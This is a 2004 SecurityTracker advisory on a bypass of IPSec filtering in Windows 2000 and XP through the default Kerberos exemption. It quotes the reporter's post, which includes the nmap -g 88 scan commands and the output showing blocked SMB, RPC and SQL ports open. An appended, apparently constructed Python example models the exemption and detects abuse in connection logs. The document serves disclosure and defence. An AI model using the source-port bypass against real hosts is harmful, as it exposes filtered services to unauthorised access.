SecurityTracker.com
SecurityTracker Archives

Category: OS (Microsoft) > IPSec
Vendors: Microsoft
Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users
SecurityTracker Alert ID: 1010314
SecurityTracker URL: http://securitytracker.com/id?1010314
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 27 2004
Impact: Host/resource access via network
Exploit Included: Yes
Vendor Confirmed: Yes
Description: A vulnerability was reported in the IPSec filtering of Microsoft Windows 2000 and XP. The IPSec driver applies a set of default traffic exemptions before the administrator's filter list is consulted, and one of them permits any TCP or UDP packet whose source or destination port is 88 (Kerberos). A remote user can therefore bypass a blocking filter and reach ports on the system that the filter was meant to protect.

JJ Gray reported that a remote user can bypass the IPSec filters by sending TCP or UDP packets with a source port of 88, for example by port scanning with nmap -g 88 against a host whose filter list blocks all inbound traffic.

Microsoft states that IPSec filters are not intended as a full host-based firewall, and documents the default exemptions, including the Kerberos exemption, in the following article:

http://support.microsoft.com/default.aspx?scid=kb;EN-US;253169

Impact:  A remote user can bypass the IPSec filtering to gain access to arbitrary ports on the system.
Solution: No solution was available at the time of this entry. The reporter notes that Windows Server 2003 removes all of the default exemptions except IKE (see the Microsoft article 810207 referenced in the source message below).

[Editor's note: The vendor has previously indicated that the IPSec filtering feature is not intended as a host-based firewall.]

Vendor URL: www.microsoft.com/technet/security/
Cause: Configuration error
Underlying OS: Windows (2000), Windows (XP)
Reported By: JJ Gray <jj@irmplc.com>
Message History: None.


Source Message Contents

Date: Wed May 19 2004 - 16:48:26 CDT
From: JJ Gray <jj@irmplc.com>
Subject: Win2K & XP IPSEC Filtering bypass

 

Hi folks,
     As a result of a recent engagement looking at Windows host hardening, I
came across this little trick and thought it might be useful at some point.
The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by
choosing a source port of 88 (Kerberos).

First off, Microsoft themselves state that IPSEC filters are not designed as
a full featured host based firewall [1] and it is already known that certain
types of traffic are exempt from IPSEC filters [2] and they can be
summarised as:

* Broadcast
* Multicast
* RSVP
* IKE
* Kerberos

In a Microsoft support note [2] there is the line:
"The Kerberos exemption is basically this: If a packet is TCP or UDP and has
a source or destination port = 88, permit."

The test host here has a "block all" rule created using:

ipsecpol.exe -x -w REG -p "The Black Knight" -r "NoneShallPass" -n BLOCK -f 0=*::*

Normal Nmap scan:

# nmap -sS -v -v -P0 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
The SYN Stealth Scan took 7 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1658 ports scanned but not shown below are in state: filtered)
PORT    STATE   SERVICE
88/tcp  closed  kerberos-sec

Nmap run completed -- 1 IP address (1 host up) scanned in 7.017 seconds

Port 88 closed is the hint, Nmap again using this source port:

# nmap -sS -v -v -P0 -g 88 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 139/tcp
Adding open port 1433/tcp
Adding open port 1027/tcp
Adding open port 1025/tcp
The SYN Stealth Scan took 0 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1653 ports scanned but not shown below are in state: closed)
PORT      STATE  SERVICE
135/tcp   open   msrpc
139/tcp   open   netbios-ssn
445/tcp   open   microsoft-ds
1025/tcp  open   NFS-or-IIS
1027/tcp  open   IIS
1433/tcp  open   ms-sql-s

Nmap run completed -- 1 IP address (1 host up) scanned in 0.367 seconds

As can be seen, the IPSEC filters are bypassed. Although not designed as a
host based firewall, IPSEC filters are being used as such, particularly to
block popular attacked ports such as NETBIOS, CIFS and SQL, perhaps as
[temporary] worm mitigation.

In Windows 2003 all of these default exemptions have been removed with the
exception of IKE [1] and I believe that this may be incorporated into
earlier Windows versions at some point.

Cheers,
             JJ

[1] http://support.microsoft.com/default.aspx?scid=kb;EN-US;810207
[2] http://support.microsoft.com/default.aspx?scid=kb;EN-US;253169
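The exemption-before-policy ordering that the advisory describes and the post demonstrates with nmap, together with a way to spot its abuse in traffic logs, as an added example that is not part of the advisory, the original post, or any Microsoft code. It models the KB 253169 rule quoted above (TCP or UDP with source or destination port 88 is permitted before the filter list is applied), contrasts the Windows 2000/XP behaviour with the Windows Server 2003 behaviour the post describes (only IKE left exempt), and runs a simple detector over constructed connection-log lines. The log line format, the IKE modelling, the addresses other than the post's 172.25.0.14, and the known-KDC set are assumptions.

```python
"""Model of the Windows 2000/XP IPSec default Kerberos exemption and a
log-based detector for traffic that abuses it.

Constructed example; not code from the original advisory, the post, or
Microsoft. The connection-log line format below is an assumption, not a
real Windows log format."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

KERBEROS_PORT = 88
IKE_PORT = 500


@dataclass(frozen=True)
class Packet:
    ts: str
    proto: str   # "TCP" or "UDP"
    src: str
    sport: int
    dst: str
    dport: int
    flags: str   # TCP flag letters such as "S" or "SA"; "" for UDP


def parse_line(line: str) -> Optional[Packet]:
    """Parse one assumed log line of the form
    '2004-05-19T18:14:02 TCP 172.25.0.99:88 -> 172.25.0.14:445 S'."""
    parts = line.split()
    if len(parts) < 5 or parts[3] != "->":
        return None
    ts, proto, src, _, dst = parts[:5]
    flags = parts[5] if len(parts) > 5 else ""
    try:
        src_ip, sport = src.rsplit(":", 1)
        dst_ip, dport = dst.rsplit(":", 1)
    except ValueError:
        return None
    if not (sport.isdigit() and dport.isdigit()):
        return None
    return Packet(ts, proto.upper(), src_ip, int(sport), dst_ip, int(dport), flags)


def kerberos_exempt(pkt: Packet) -> bool:
    """KB 253169 rule as quoted in the post: TCP or UDP with source OR
    destination port 88 is permitted before the policy filters are applied."""
    return pkt.proto in ("TCP", "UDP") and KERBEROS_PORT in (pkt.sport, pkt.dport)


def reaches_host(pkt: Packet, default_exempt: bool) -> bool:
    """Does the packet get past a 'block all' filter list (the post's
    NoneShallPass rule)? default_exempt=True models Windows 2000/XP;
    False models Windows Server 2003, where the post says only IKE remains
    exempt (IKE modelled here as UDP to port 500, an assumption)."""
    if pkt.proto == "UDP" and pkt.dport == IKE_PORT:
        return True
    if default_exempt and kerberos_exempt(pkt):
        return True
    return False  # the filter list itself blocks everything else


def suspicious_kerberos_sport(packets: Iterable[Packet], kdcs: Set[str]) -> List[Packet]:
    """Flag packets that ride the exemption without looking like Kerberos:
    source port 88 from a host that is not a known KDC, or a TCP connection
    *initiated* (SYN without ACK) from port 88, which a real KDC never does."""
    hits = []
    for p in packets:
        if p.sport != KERBEROS_PORT or p.dport == KERBEROS_PORT:
            continue
        initiating_syn = p.proto == "TCP" and "S" in p.flags and "A" not in p.flags
        if p.src not in kdcs or initiating_syn:
            hits.append(p)
    return hits


def analyze(log_text: str, kdcs: Set[str]) -> Dict[str, object]:
    """Parse a log, then report what a block-all policy lets through on each
    platform model and which of those packets the detector would flag."""
    pkts = [p for p in map(parse_line, log_text.splitlines()) if p is not None]

    def key(p: Packet) -> str:
        return f"{p.src}:{p.sport}->{p.dst}:{p.dport}"

    return {
        "parsed": len(pkts),
        "reach_2000_xp": [key(p) for p in pkts if reaches_host(p, True)],
        "reach_2003": [key(p) for p in pkts if reaches_host(p, False)],
        "flagged": [key(p) for p in suspicious_kerberos_sport(pkts, kdcs)],
    }


# Constructed sample: 172.25.0.14 is the filtered host from the post,
# 172.25.0.99 a scanner using 'nmap -g 88', 172.25.0.10 an assumed KDC.
SAMPLE_LOG = """\
2004-05-19T18:14:01 TCP 172.25.0.99:45120 -> 172.25.0.14:445 S
2004-05-19T18:14:02 TCP 172.25.0.99:88 -> 172.25.0.14:445 S
2004-05-19T18:14:02 TCP 172.25.0.99:88 -> 172.25.0.14:1433 S
2004-05-19T18:14:03 UDP 172.25.0.99:88 -> 172.25.0.14:135
2004-05-19T18:14:05 TCP 172.25.0.10:88 -> 172.25.0.14:1031 SA
2004-05-19T18:14:06 UDP 172.25.0.10:88 -> 172.25.0.14:1032
2004-05-19T18:14:07 TCP 172.25.0.14:1033 -> 172.25.0.10:88 S
"""
KNOWN_KDCS = {"172.25.0.10"}

if __name__ == "__main__":
    for name, value in analyze(SAMPLE_LOG, KNOWN_KDCS).items():
        print(name, value)
```

The detector rests on two observations: a KDC only ever answers from port 88, so an inbound TCP SYN without ACK from port 88 is never Kerberos, and legitimate port-88 sources are hosts you can enumerate. Under the block-all policy every packet touching port 88 reaches the Windows 2000/XP model while nothing reaches the 2003 model, and only the scanner's packets are flagged; the KDC's replies to the host's own requests pass unflagged. To use it on real data, replace parse_line with a parser for your log format.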

 


Copyright 2004, SecurityGlobal.net LLC